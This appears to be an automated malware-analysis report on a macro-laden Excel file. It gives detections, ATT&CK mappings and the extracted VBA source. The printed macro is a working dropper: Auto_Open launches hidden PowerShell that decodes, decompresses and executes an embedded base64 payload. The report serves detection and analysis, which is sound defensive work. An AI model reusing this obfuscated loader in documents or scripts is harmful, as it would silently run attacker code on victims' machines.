MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is automatically executed upon opening. This macro utilizes the Environ function to gather system information and then constructs a command to execute PowerShell. The PowerShell command is obfuscated and likely intended to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6328593-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6328593-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell owlet, vbHide -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
If Arch = "AMD64" Then piglet = windir + "\syswow64\windowspowershell\v1.0\powershell.exe" Else -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Name = "Module1" Sub Auto_Open() Dim piglet As String -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Arch = Environ("PROCESSOR_ARCHITECTURE") windir = Environ("windir")
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4084 bytes |
SHA-256: 06f63227ccd8fe0fdcfec7f166e730308361ae70c63c2172a2a901e6001c996d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
Dim piglet As String
Dim whelp As String
Dim owlet As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
piglet = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
piglet = "powershell.exe"
End If
whelp = "zVdRj6M2EH7Pr7AiHhJtWBkbQ7hopbv2VOmkqqq0q/YhygMY00UlJC"
whelp = whelp + "Lkmr22/73MOGNidntq+9SXATPjb74Zj8cm0OyBvZ/Pth+b5t"
whelp = whelp + "P+eOj6xfxX07WmkeK+bJr5cseO56KpNTv1eT88zKUf9OxT2/"
whelp = whelp + "/Yd+ynuuvPefOhaQ56cf3224qd67Znl+vz5fr8stz8Zz/fdi"
whelp = whelp + "bvzdPz8CjJz/mK+3nFRs/Xtxvf1y9T7/vTZ931/8T33uxPpl"
whelp = whelp + "+8RnZRzd/PgsOQyA9lGT69HA0LhzmF6T6aqm7rvj60LNAs/C"
whelp = whelp + "HfGzb/uW6lmLOwHUanY64Nwy/fnVsNlicWHvPTqX/uzrPg8h"
whelp = whelp + "Ac3r3zksxX/BJxDg9pHzFfbtj2m5febHe74AQryi+VHjRmPY"
whelp = whelp + "h1Ngg0HEXCSWEUAEWDKAUoYlAUg1ACPXhDrr1h5IxTGArwxq"
whelp = whelp + "tBFCnQyuFbQvBVRW8aQHOAkiAS+JbCG0cUeBNgotEYpvESBA"
whelp = whelp + "4B2YBdxYmGSn1WjnMsyAfOLUcFvKWYHEWE0pg4j8ZqnAHG0d"
whelp = whelp + "o5WhNJayyBlSRvcUZ20mXI2n01G38brwRvBkkC3QpAOXhLwa"
whelp = whelp + "4CrSxoKGKywzSpCefY45wkjh8SLzzjSHvG1m4SkSukOCZ4FK"
whelp = whelp + "oggeurwERBdpULHyNCR6oiLSJHQNwgF+CnIKwE7BIDQtFq2V"
whelp = whelp + "IGRQppSjJngt5i0saaTLAceUoMSkwTZsjfH3ZfoV+wS3MHr5"
whelp = whelp + "2AOERFiyzAL24XLAvcC4kkgASgUk7TkL3FEw5P0TIK51xJqq"
whelp = whelp + "ZYkQKLYfQ2zlCTHMSOPShS6ZANJcfiKYcX+XhYSMKBxkQS4T"
whelp = whelp + "GEt8K/CWHkkhAXNcnBGIzw5uI3ZIqRI5eJo1j+6xkYqmuHtv"
whelp = whelp + "T+l8Lyy1a33QLXdyoiSqLEvQV5TmFaPqnxghS4JW3jyQjAom"
whelp = whelp + "Drk/63NS3ZZGtgYSq3/WwHBrwMXOrktXMs9DEiPGywXScuXm"
whelp = whelp + "z/9mSKSXsjIvfm/CKyGgu48PwiIe233DeTmBCewL4LQ2z16Q"
whelp = whelp + "RvclbEHjJqq4S0tk8CgyojpjwjRzkkW49NunyDuFsAW7YYvv"
whelp = whelp + "Fclmr1Kja7jK42MLYxYYULGpsv9wMsKloK4d7sRQMJpRRboT"
whelp = whelp + "2/GFvkVhq3PTbVLCOTUSAyNgC7TRUNby4nMBeP9wK0uaA4Rq"
whelp = whelp + "YYZeyMub0UvUa5aeZj7aakxa2WY63hAa48H5kkBQp7W0o9AO"
whelp = whelp + "76/XRruJLCsyxLHID4WklpqAN7uIIPewOQvp0ipsgetZhs6X"
whelp = whelp + "b8KGyjdeelPYrc2YNHwnhGpcgZjfEe5roybt3UdX7b/jMymR"
whelp = whelp + "xynG9m1aFji6B+4JugZmFjhsFJ339v2l/65zBaDl/v7pbsd7"
whelp = whelp + "jaXu/WW3u53i2Cy/3TYRhIsVjeBfVyxYap26DerVi0ZH+ww7"
whelp = whelp + "kP23PTbP6cBV/wcuz9GQwZWgWXFTzgUvzY510fPjbGHFn4aP"
whelp = whelp + "ShLRncnTn/Cw=="
owlet = piglet + " -NoP -NonI -W Hidden -Command ""Invoke-E"
owlet = owlet + "xpression $(New-Object IO.StreamReader ($(New-Ob"
owlet = owlet + "ject IO.Compression.DeflateStream ($(New-Object "
owlet = owlet + "IO.MemoryStream (,$([Convert]::FromBase64String("
owlet = owlet + "\"" " & whelp & " \"" )))), [IO.Compression.Compre"
owlet = owlet + "ssionMode]::Decompress)), [Text.Encoding]::ASCII"
owlet = owlet + ")).ReadToEnd();"""
Shell owlet, vbHide
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18944 bytes |
SHA-256: a28ec87a32f3a2a9ccf029c268f6f5b19e99fbe562a28c6a82f8fabace475baa |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.